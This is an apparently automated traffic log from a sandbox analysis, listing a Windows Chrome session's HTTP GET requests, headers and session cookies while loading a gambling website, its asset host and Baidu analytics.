Source: global trafficHTTP traffic detected: GET /images_plus/footer/footer-logo.png?ver=1606790107 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/footer/footer-gt.png?ver=1606790107 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/footer/footer-Thwate.png?ver=1606790107 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/footer/footer-GamCare.png?ver=1606790107 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/footer/footer-gibraltar.png?ver=1606790107 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/banner1.jpg?ver=1606891697 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/cms/cms_1051.png?ver=1611754184 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/footer/footer-18plus.png?ver=1606790107 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/js/caller.js?ver=1675418257 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hm.gif?hca=E4D1CF12C6FA10DD&cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=907&et=0&ja=0&ln=en-us&lo=0&rnd=450682172&si=947ea0365dd8ab01fc51bd9439b42930&v=1.3.2&lv=1&sn=48177&r=0&ww=1280&u=https%3A%2F%2Fb45032.com%2F%23&tt=bet365%E8%8B%B1%E5%9B%BD%E4%B8%8A%E5%B8%82%E5%AE%98%E7%BD%91 HTTP/1.1Host: hm.baidu.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DD
Source: global trafficHTTP traffic detected: GET /common/storage/cms/cms_1143.png?ver=1708958748 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/banner4.jpg?ver=1606891699 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/banner2.jpg?ver=1606891698 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/banner5.jpg?ver=1606891700 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/banner6.jpg?ver=1606891697 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hm.js?947ea0365dd8ab01fc51bd9439b42930 HTTP/1.1Host: hm.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DD
Source: global trafficHTTP traffic detected: GET /images_plus/footer/footer-logo.png?ver=1606790107 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/other/banner7.jpg?ver=1606891701 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /member/call-request?check=1 HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZQYnZrbHRNY3ZwWHNwTU5DRHpRd2c9PSIsInZhbHVlIjoieE1Kb3cwWHVIb2Roc0pBcnNyOVRcLzNnalluWWxOREpENFV5TTNwVjFFbjdsalwvVU5XTHNFQit4bWRKSFZrSWZUSklYNDBcL3FVRVBPV3lKVkM3RFdIZ3c9PSIsIm1hYyI6ImU5OWRiNmNkMWQ0YTk5NzdiYmJjODkwZjFiMjZkNjZlNTljNzViZGE1Zjg5MTBiYTVjZmY2NTcyMGM4YmQyMDkifQ%3D%3D; vanguard_session=eyJpdiI6Ik1vMzBOMWtcL1ZTZ3ZHQ3BqREs1SFB3PT0iLCJ2YWx1ZSI6Ill0NVlqZk5SdTQ1WGVuTWtrUkdxSEV4XC9DbWYrS0k2b01PVWkxenF3d0wxWUl4bVlrZDVNUTJ2NWNUVGVPZFp6VXJCS2pWSHlhdCt0MEZLMVwvZ3ppTUE9PSIsIm1hYyI6ImZkODJkNTUwOGQyYWQ0ZWRiZjhhYWM3ODQ5ODkzNjFiYjljNTVlMTY4OTMwYTdlZWI0YTEzODdjMzNkM2M5N2IifQ%3D%3D; Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD
Source: global trafficHTTP traffic detected: GET /hm.gif?hca=E4D1CF12C6FA10DD&cc=1&ck=1&cl=24-bit&ds=1280x1024&vl=907&et=0&ja=0&ln=en-us&lo=0&rnd=450682172&si=947ea0365dd8ab01fc51bd9439b42930&v=1.3.2&lv=1&sn=48177&r=0&ww=1280&u=https%3A%2F%2Fb45032.com%2F%23&tt=bet365%E8%8B%B1%E5%9B%BD%E4%B8%8A%E5%B8%82%E5%AE%98%E7%BD%91 HTTP/1.1Host: hm.baidu.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HMACCOUNT_BFESS=E4D1CF12C6FA10DD
Source: global trafficHTTP traffic detected: GET /images_plus/footer/footer-gt.png?ver=1606790107 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plugins/jquery-ui/images/ui-icons_777777_256x240.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5getfab.segrft.com/plugins/jquery-ui/jquery-ui.min.css?ver=1606790105Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/footer/footer-gibraltar.png?ver=1606790107 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/footer/footer-GamCare.png?ver=1606790107 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/footer/footer-Thwate.png?ver=1606790107 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plugins/jquery-ui/images/ui-icons_555555_256x240.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5getfab.segrft.com/plugins/jquery-ui/jquery-ui.min.css?ver=1606790105Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/footer/footer-18plus.png?ver=1606790107 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /member/call-request?check=1 HTTP/1.1Host: b45032.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZQYnZrbHRNY3ZwWHNwTU5DRHpRd2c9PSIsInZhbHVlIjoieE1Kb3cwWHVIb2Roc0pBcnNyOVRcLzNnalluWWxOREpENFV5TTNwVjFFbjdsalwvVU5XTHNFQit4bWRKSFZrSWZUSklYNDBcL3FVRVBPV3lKVkM3RFdIZ3c9PSIsIm1hYyI6ImU5OWRiNmNkMWQ0YTk5NzdiYmJjODkwZjFiMjZkNjZlNTljNzViZGE1Zjg5MTBiYTVjZmY2NTcyMGM4YmQyMDkifQ%3D%3D; Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; vanguard_session=eyJpdiI6IlZhYlordnhKaWFTdkU1QzlLbUdrQVE9PSIsInZhbHVlIjoiZ0xuQ3MrSTk4K3BXa3djWGNmemoxV0NPNmp0QzFSc2xWa01hWWJuWTRBelA0UUpLcE9FZ1ZMTEhxR0dDNGV4YlwvY05wa2FyeFFzemhucWtnbE1oME9BPT0iLCJtYWMiOiJjZjg1MTJkZTQwYTE5MGFhYjg0NmFiYzgzNjhiODYzZWY4YTc4NmE1MzcwNmEyZDQ0NjgwNmZmNjM4ZmNmMzkyIn0%3D
Source: global trafficHTTP traffic detected: GET /assets/js/caller.js?ver=1675418257 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /common/storage/cms/cms_1143.png?ver=1708958748 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plugins/jquery-ui/images/ui-icons_777777_256x240.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/main/favicon.ico?ver=1606790107 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plugins/jquery-ui/images/ui-icons_555555_256x240.png HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images_plus/main/favicon.ico?ver=1606790107 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /egame/224 HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InZQYnZrbHRNY3ZwWHNwTU5DRHpRd2c9PSIsInZhbHVlIjoieE1Kb3cwWHVIb2Roc0pBcnNyOVRcLzNnalluWWxOREpENFV5TTNwVjFFbjdsalwvVU5XTHNFQit4bWRKSFZrSWZUSklYNDBcL3FVRVBPV3lKVkM3RFdIZ3c9PSIsIm1hYyI6ImU5OWRiNmNkMWQ0YTk5NzdiYmJjODkwZjFiMjZkNjZlNTljNzViZGE1Zjg5MTBiYTVjZmY2NTcyMGM4YmQyMDkifQ%3D%3D; Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; vanguard_session=eyJpdiI6IkpzQnVUWkllekNoT1NvZmx2VSswQkE9PSIsInZhbHVlIjoieWpTQ0luNDY1cTZ3VFlDN2cyWDBSKzljTDhsWkpBSnZqSEF3TWNPeHZRQklhaTcyc3dnTnJYQ3BESDRSWWRWMjVZcTJRZFN4aEhISSsrU01VNDdTcUE9PSIsIm1hYyI6ImJiMDc1ZTBkYmI3NTAxNzEyZWM1NmY0OGM5YTUyMTgzNWY2YTY2ZjhiNGU2NTRkNDAxNzhiZmNlODRjMjZmNzEifQ%3D%3D
Source: global trafficHTTP traffic detected: GET /plus/css/unite/egame_unite.css?ver=1658200755 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/css/custom/egame_custom.css?ver=1736392866 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /plus/js/unite/egame_unite.js?ver=1723802385 HTTP/1.1Host: 5getfab.segrft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://b45032.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gdcode_1736725694 HTTP/1.1Host: b45032.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://b45032.com/egame/224Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: Hm_lvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; Hm_lpvt_947ea0365dd8ab01fc51bd9439b42930=1736725677; HMACCOUNT=E4D1CF12C6FA10DD; XSRF-TOKEN=eyJpdiI6IjBsZDJ0a3hCTDBuSGhDNTBORFFUcVE9PSIsInZhbHVlIjoiWVNaU2xVRXhZVjF6TW1kbytmUTV1UkVIRmRVNkJnQUFJdWhGYUVLNm51M2VBZ3F4UHYxd1ZJZUlnUXcwdnF2MkZrUWZJdHFoU25zTHl4UHN4VFJxY0E9PSIsIm1hYyI6IjllMGQ3NmU3NmRmZjVlYzczZmMyYjU3NjllNmM3NTVkOTkxMzk2ODRkZTcyOGUwZDEzZmQ5MTFmN2Q5NDI0OTgifQ%3D%3D; vanguard_session=eyJpdiI6InNHR2l3SDRCenJrYmtUSTYrT0dDeVE9PSIsInZhbHVlIjoiSVJsSktTWllHVVlkMHNqbmNyNXZwOFE0bDR6WnVObWRMK0ZOWWVVQll5XC90YnhhVmJNRG8xUXdNMGgySHVlOWZOSUJKZUpROTdcLzJlZXA2OU5NN21rZz09IiwibWFjIjoiM2NlZWI4ZDFmMjAyNDA5MjE5OWYxZGMwNjQ5YmM5MzJhMzViN2ViMTY1ODUwYjkzOGQ4OTVlMmVmMmEzM2Y0MSJ9
